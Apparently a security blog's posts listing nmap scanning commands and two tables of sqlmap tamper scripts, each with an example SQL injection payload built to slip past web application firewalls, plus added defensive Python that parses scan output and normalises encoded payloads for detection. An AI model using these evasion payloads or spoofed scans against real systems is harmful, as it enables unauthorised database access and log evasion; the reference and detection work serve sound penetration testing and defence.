14.9.16

Some Useful Nmap Commands

Below is a list of some useful nmap commands, most of which are kept in a text file on my desktop for quick reference. Detecting services that can be abused for reflective DoS is normally a quick win, especially internally.

Display the reason a port is in its current state
nmap --reason 127.0.0.1
Show all packets sent and received
nmap --packet-trace 127.0.0.1
Determine which IP protocols are supported
nmap -sO 127.0.0.1
Find IPs not in use on a network
nmap -T4 -sP 127.0.0.1/8 && egrep "00:00:00:00:00:00" /proc/net/arp
Find rogue access points
nmap -A -p1-85,113,443,8080-8100 -T4 --min-hostgroup 50 --max-rtt-timeout 2000 --initial-rtt-timeout 300 --max-retries 3 --host-timeout 20m --max-scan-delay 1000 -oA wapscan 10.0.0.0/8

Spoof a specific MAC address whilst scanning
nmap --spoof-mac 00:11:22:33:44:55 127.0.0.1

And with a random MAC
nmap --spoof-mac 0 127.0.0.1

Check for UDP services vulnerable to reflection attacks (DDoS)
nmap -sU -A -PN -n -pU:19,53,123,161 --script=ntp-monlist,dns-recursion,snmp-sysdescr 127.0.0.1/8
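What the reflection scan leaves you with is a pile of grepable output that has to become a remediation list. The following is an added example, not part of the original post or of nmap itself: it parses nmap -oG lines (assuming the standard port/state/protocol//service//version/ layout of the "Ports:" field) and buckets each host's reflection-capable services into confirmed open versus open|filtered, which a UDP scan reports when no reply came back and which still needs verifying. The scan output embedded below is constructed, not a real result.

```python
"""Turn a UDP reflection scan's grepable output into a remediation list.

Parses nmap -oG lines and reports, per host, which of the reflection-capable
services the scan above probes (chargen/19, dns/53, ntp/123, snmp/161) are
confirmed open and which came back open|filtered and still need verifying.
"""
import re

# Services on the ports the scan probes (-pU:19,53,123,161).
REFLECTION_PORTS = {19: "chargen", 53: "dns", 123: "ntp", 161: "snmp"}

# One entry in the -oG "Ports:" field: port/state/proto/owner/service/rpc/version/
PORT_ENTRY = re.compile(r"^(\d+)/([^/]+)/udp/")

# Constructed sample of -oG output for two hosts (not a real scan result).
SAMPLE_GNMAP = """\
# Nmap 7.12 scan initiated <date> as: nmap -sU -A -PN -n -pU:19,53,123,161 -oG udp.gnmap 10.0.0.0/24
Host: 10.0.0.5 ()\tStatus: Up
Host: 10.0.0.5 ()\tPorts: 19/closed/udp//chargen///, 53/open/udp//domain//dnsmasq/, 123/open/udp//ntp///, 161/open|filtered/udp//snmp///\tIgnored State: closed (0)
Host: 10.0.0.9 ()\tStatus: Up
Host: 10.0.0.9 ()\tPorts: 19/open/udp//chargen///, 53/closed/udp//domain///, 123/closed/udp//ntp///, 161/open/udp//snmp///\tIgnored State: closed (0)
# Nmap done at <date> -- 256 IP addresses (2 hosts up) scanned
"""


def parse_gnmap(text):
    """Return a list of (ip, port, state) for every UDP entry in -oG output."""
    entries = []
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        ip = line.split()[1]
        # Fields in a -oG line are tab separated; isolate the Ports: field.
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        for item in ports_field.split(","):
            m = PORT_ENTRY.match(item.strip())
            if m:
                entries.append((ip, int(m.group(1)), m.group(2)))
    return entries


def reflection_exposure(text):
    """Map each host to its confirmed-open and unverified reflection services.

    UDP scans report 'open|filtered' when no reply came back; those ports are
    listed separately so they get re-checked rather than assumed safe.
    """
    report = {}
    for ip, port, state in parse_gnmap(text):
        if port not in REFLECTION_PORTS:
            continue
        if state == "open":
            bucket = "open"
        elif state == "open|filtered":
            bucket = "unverified"
        else:
            continue
        host = report.setdefault(ip, {"open": [], "unverified": []})
        host[bucket].append(REFLECTION_PORTS[port])
    return report


if __name__ == "__main__":
    for ip, found in sorted(reflection_exposure(SAMPLE_GNMAP).items()):
        print(f"{ip}: open={found['open']} unverified={found['unverified']}")
```

Script results from -A (ntp-monlist, dns-recursion, snmp-sysdescr) only land in the normal and XML outputs, not in -oG, so this pass tells you where to look rather than confirming amplification; the unverified bucket is the list to re-scan with a longer timeout before closing tickets.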

4.7.16

SQLMap Tamper Scripts Update


So my last post from three years ago was pretty well received, but with the rate at which SQLMap is developed it is definitely out of date.

Here's an updated table of all tamper scripts included with the latest version (as of time of writing, 04/July/2016).

I will be putting something together, possibly as a commit to the SQLMap project, to aid with these. I'll update once done, so stay tuned.



Name | Description | Example
apostrophemask.py | Replaces apostrophe character with its UTF-8 full width counterpart | '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'
apostrophenullencode.py | Replaces apostrophe character with its illegal double unicode counterpart | '1 AND %271%27=%271'
appendnullbyte.py | Appends encoded NULL byte character at the end of payload | '1 AND 1=1'
base64encode.py | Base64-encodes all characters in a given payload | 'MScgQU5EIFNMRUVQKDUpIw=='
between.py | Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' | '1 AND A NOT BETWEEN 0 AND B--'
bluecoat.py | Replaces space character after SQL statement with a valid random blank character. Afterwards replaces the '=' character with the LIKE operator | 'SELECT%09id FROM users where id LIKE 1'
chardoubleencode.py | Double URL-encodes all characters in a given payload (not processing already encoded) | '%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545'
commalesslimit.py | Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M' | 'LIMIT 3 OFFSET 2'
commalessmid.py | Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)' | 'MID(VERSION() FROM 1 FOR 1)'
concat2concatws.py | Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' | 'CONCAT_WS(MID(CHAR(0),0,0),1,2)'
charencode.py | URL-encodes all characters in a given payload (not processing already encoded) | '%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45'
charunicodeencode.py | Unicode-URL-encodes non-encoded characters in a given payload (not processing already encoded) | '%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045'
equaltolike.py | Replaces all occurrences of the equals operator ('=') with the operator 'LIKE' | 'SELECT * FROM users WHERE id LIKE 1'
escapequotes.py | Slash-escapes quotes (' and ") | '1\\\\" AND SLEEP(5)#'
greatest.py | Replaces greater than operator ('>') with 'GREATEST' counterpart | '1 AND GREATEST(A,B+1)=A'
halfversionedmorekeywords.py | Adds versioned MySQL comment before each keyword | "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
ifnull2ifisnull.py | Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' | 'IF(ISNULL(1),2,1)'
modsecurityversioned.py | Wraps the complete query in a versioned comment | '1 /*!30874AND 2>1*/--'
modsecurityzeroversioned.py | Wraps the complete query in a zero-versioned comment | '1 /*!00000AND 2>1*/--'
multiplespaces.py | Adds multiple spaces around SQL keywords | '1 UNION SELECT foobar'
nonrecursivereplacement.py | Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters | '1 UNIOUNIONN SELESELECTCT 2--'
percentage.py | Adds a percentage sign ('%') in front of each character | '%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E'
overlongutf8.py | Converts all characters in a given payload to overlong UTF-8 (not processing already encoded) | 'SELECT%C0%AAFIELD%C0%AAFROM%C0%AATABLE%C0%AAWHERE%C0%AA2%C0%BE1'
randomcase.py | Replaces each keyword character with random case value | 'INseRt'
randomcomments.py | Adds random comments to SQL keywords | 'I/**/N/**/SERT'
securesphere.py | Appends a specially crafted string | "1 AND 1=1 and '0having'='0having'"
sp_password.py | Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs | '1 AND 9227=9227-- sp_password'
space2comment.py | Replaces space character (' ') with comments '/**/' | 'SELECT/**/id/**/FROM/**/users'
space2dash.py | Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n') | '1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'
space2hash.py | Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') | '1%23nVNaVoPYeva%0AAND%23ngNvzqu%0A9227=9227'
space2morehash.py | Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') | '1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23lujYFWfv%0A9227=9227'
space2mssqlblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters | 'SELECT%0Eid%0DFROM%07users'
space2mssqlhash.py | Replaces space character (' ') with a pound character ('#') followed by a new line ('\n') | '1%23%0AAND%23%0A9227=9227'
space2mysqlblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters | 'SELECT%A0id%0BFROM%0Cusers'
space2mysqldash.py | Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n') | '1--%0AAND--%0A9227=9227'
space2plus.py | Replaces space character (' ') with plus ('+') | 'SELECT+id+FROM+users'
space2randomblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters | 'SELECT%0Did%0DFROM%0Ausers'
symboliclogical.py | Replaces AND and OR logical operators with their symbolic counterparts (&& and ||) | "1 %26%26 '1'='1"
unionalltounion.py | Replaces UNION ALL SELECT with UNION SELECT | '-1 UNION SELECT'
unmagicquotes.py | Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work) | '1%bf%27 AND 1=1-- '
uppercase.py | Replaces each keyword character with upper case value | 'INSERT'
varnish.py | Appends an HTTP header 'X-originating-IP' | http://h30499.www3.hp.com/t5/Fortify-Application-Security/Bypassing-web-application-firewalls-using-HTTP-headers/ba-p/6418366
versionedkeywords.py | Encloses each non-function keyword with versioned MySQL comment | '1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#'
versionedmorekeywords.py | Encloses each keyword with versioned MySQL comment | '1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#'
xforwardedfor.py | Appends a fake HTTP header 'X-Forwarded-For' | ' headers["X-Forwarded-For"]'
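Read from the defensive side, the table is a checklist of what a request has to be normalised through before a signature is applied: percent, double and %u encoding, full-width apostrophes, block and versioned MySQL comments, # and -- line comments, alternate blank characters, symbolic operators and random case. The following is an added example in Python and is not sqlmap code or anything from the project: a normaliser that undoes those transformations, with the sample payloads copied from the table above. The signature names, the latin-1 fallback for undecodable bytes, and the choice to treat '+' as a space and '||' as OR are my own assumptions, made for detection convenience rather than as exact SQL rewrites.

```python
"""Normalise a request parameter before signature matching.

Undoes the encodings and comment tricks in the tamper-script table above
(percent/double/%u encoding, full-width apostrophes, /**/ and /*!...*/
comments, # and -- line comments, alternate blank characters, && and ||,
random case) so a rule written against plain SQL still matches.
"""
import re
import unicodedata
from urllib.parse import unquote_to_bytes

# Example payloads copied from the tamper-script table on this page.
SAMPLES = {
    "space2comment": "SELECT/**/id/**/FROM/**/users",
    "chardoubleencode": "%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545"
                        "%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545",
    "charunicodeencode": "%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045"
                         "%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045",
    "space2mssqlblank": "SELECT%0Eid%0DFROM%07users",
    "space2hash": "1%23nVNaVoPYeva%0AAND%23ngNvzqu%0A9227=9227",
    "modsecurityzeroversioned": "1 /*!00000AND 2>1*/--",
    "apostrophemask": "1 AND %EF%BC%871%EF%BC%87=%EF%BC%871",
    "symboliclogical": "1 %26%26 '1'='1",
    "randomcase": "INseRt",
}

# Signatures are applied to the normalised text only (names are my own).
SIGNATURES = {
    "union-select": re.compile(r"\bUNION\b(?:\s+ALL)?\s+SELECT\b"),
    "select-from": re.compile(r"\bSELECT\b.+\bFROM\b"),
    "tautology": re.compile(r"\bAND\s+'?(\w+)'?\s*=\s*'?\1'?"),
    "time-based": re.compile(r"\bSLEEP\s*\("),
}


def _percent_decode(text):
    """One round of percent decoding, including the %uXXXX form.
    Bytes that are not valid UTF-8 (the lone %A0 or %bf the table shows)
    fall back to latin-1 so nothing is silently dropped."""
    text = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), text)
    raw = unquote_to_bytes(text)
    try:
        return raw.decode("utf-8")
    except UnicodeDecodeError:
        return raw.decode("latin-1")


def normalise(payload, max_rounds=3):
    """Return an upper-cased, decoded, comment-free form of the payload."""
    text = payload
    # Decode repeatedly so chardoubleencode.py output unwraps fully.
    for _ in range(max_rounds):
        decoded = _percent_decode(text)
        if decoded == text:
            break
        text = decoded
    # Full-width apostrophes (apostrophemask.py) fold to ASCII under NFKC.
    text = unicodedata.normalize("NFKC", text)
    # Form-encoded '+' is a space (space2plus.py); this also flattens 'B+1'.
    text = text.replace("+", " ")
    # Versioned MySQL comment openers '/*!00000' and '/*!' become blanks ...
    text = re.sub(r"/\*!\d*", " ", text)
    # ... then ordinary block comments are removed whole ...
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)
    # ... and the closers left over from the versioned form are dropped.
    text = text.replace("*/", " ")
    # '#junk\n' and '--junk\n' line comments (space2hash.py, space2dash.py).
    text = re.sub(r"(?:#|--)[^\n]*(?:\n|$)", " ", text)
    # Symbolic operators back to keywords (symboliclogical.py). '||' is string
    # concatenation in some dialects, so this is a detection convenience.
    text = text.replace("&&", " AND ").replace("||", " OR ")
    # Control characters, NBSP and undecodable residue (space2*blank.py,
    # overlongutf8.py, unmagicquotes.py) all count as blanks ...
    text = re.sub(r"[^\x21-\x7e]+", " ", text)
    # ... runs of blanks collapse (multiplespaces.py), case is folded (randomcase.py).
    return re.sub(r" +", " ", text).strip().upper()


def classify(payload):
    """Names of the signatures that match the normalised payload."""
    text = normalise(payload)
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]


if __name__ == "__main__":
    for name, sample in SAMPLES.items():
        print(f"{name:26} {normalise(sample)!r:40} {classify(sample)}")
```

Two rows of the table deliberately fall outside what a normaliser can do: nonrecursivereplacement.py ('UNIOUNIONN') targets filters that delete a keyword once, so the fix is to match rather than strip, and the operator substitutions (equaltolike.py, between.py, greatest.py) change semantics and belong in the signature set, not in the decoder. Over-decoding is a real trade-off here: a legitimate literal '%25' also unwraps, which is acceptable for a detector but not for anything that rewrites the request.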

7.5.15

Data Protection Flash Cards

Over at Designing for Privacy they've come up with a fantastic new way of raising data protection issues in the design process.

The set of flash cards is split into four categories (constraints / regulation / system / users) and can be used to think through the legal, moral and ethical responsibilities of the parties involved during the design process.

To take a look head on over to www.designingforprivacy.co.uk where you can also find the downloadable versions to print.

15.5.13

SQLMap's Tamper Scripts

THIS POST IS OUTDATED, PLEASE SEE LATEST VERSION HERE

I've been playing with SQLMap a lot recently to automate all sorts of injections; something which isn't so well documented is the tamper scripts that come with it.

Here's a table with short explanations of what each does, maybe someone will find it useful.


Name | Description | Example
apostrophemask.py | Replaces apostrophe character with its UTF-8 full width counterpart | '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'
apostrophenullencode.py | Replaces apostrophe character with its illegal double unicode counterpart | '1 AND %271%27=%271'
appendnullbyte.py | Appends encoded NULL byte character at the end of payload | '1 AND 1=1'
base64encode.py | Base64-encodes all characters in a given payload | 'MScgQU5EIFNMRUVQKDUpIw=='
between.py | Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' | '1 AND A NOT BETWEEN 0 AND B--'
bluecoat.py | Replaces space character after SQL statement with a valid random blank character. Afterwards replaces the '=' character with the LIKE operator | 'SELECT%09id FROM users where id LIKE 1'
chardoubleencode.py | Double URL-encodes all characters in a given payload (not processing already encoded) | '%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545'
charencode.py | URL-encodes all characters in a given payload (not processing already encoded) | '%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45'
charunicodeencode.py | Unicode-URL-encodes non-encoded characters in a given payload (not processing already encoded) | '%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045'
equaltolike.py | Replaces all occurrences of the equals operator ('=') with the operator 'LIKE' | 'SELECT * FROM users WHERE id LIKE 1'
greatest.py | Replaces greater than operator ('>') with 'GREATEST' counterpart | '1 AND GREATEST(A,B+1)=A'
halfversionedmorekeywords.py | Adds versioned MySQL comment before each keyword | "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
ifnull2ifisnull.py | Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' | 'IF(ISNULL(1),2,1)'
modsecurityversioned.py | Wraps the complete query in a versioned comment | '1 /*!30874AND 2>1*/--'
modsecurityzeroversioned.py | Wraps the complete query in a zero-versioned comment | '1 /*!00000AND 2>1*/--'
multiplespaces.py | Adds multiple spaces around SQL keywords | '1 UNION SELECT foobar'
nonrecursivereplacement.py | Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters | '1 UNIOUNIONN SELESELECTCT 2--'
percentage.py | Adds a percentage sign ('%') in front of each character | '%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E'
randomcase.py | Replaces each keyword character with random case value | 'INseRt'
randomcomments.py | Adds random comments to SQL keywords | 'I/**/N/**/SERT'
securesphere.py | Appends a specially crafted string | "1 AND 1=1 and '0having'='0having'"
sp_password.py | Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs | '1 AND 9227=9227-- sp_password'
space2comment.py | Replaces space character (' ') with comments '/**/' | 'SELECT/**/id/**/FROM/**/users'
space2dash.py | Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n') | '1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'
space2hash.py | Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') | '1%23nVNaVoPYeva%0AAND%23ngNvzqu%0A9227=9227'
space2morehash.py | Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') | '1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23lujYFWfv%0A9227=9227'
space2mssqlblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters | 'SELECT%0Eid%0DFROM%07users'
space2mssqlhash.py | Replaces space character (' ') with a pound character ('#') followed by a new line ('\n') | '1%23%0AAND%23%0A9227=9227'
space2mysqlblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters | 'SELECT%A0id%0BFROM%0Cusers'
space2mysqldash.py | Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n') | '1--%0AAND--%0A9227=9227'
space2plus.py | Replaces space character (' ') with plus ('+') | 'SELECT+id+FROM+users'
space2randomblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters | 'SELECT%0Did%0DFROM%0Ausers'
unionalltounion.py | Replaces UNION ALL SELECT with UNION SELECT | '-1 UNION SELECT'
unmagicquotes.py | Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work) | '1%bf%27 AND 1=1-- '
versionedkeywords.py | Encloses each non-function keyword with versioned MySQL comment | '1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#'
versionedmorekeywords.py | Encloses each keyword with versioned MySQL comment | '1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#'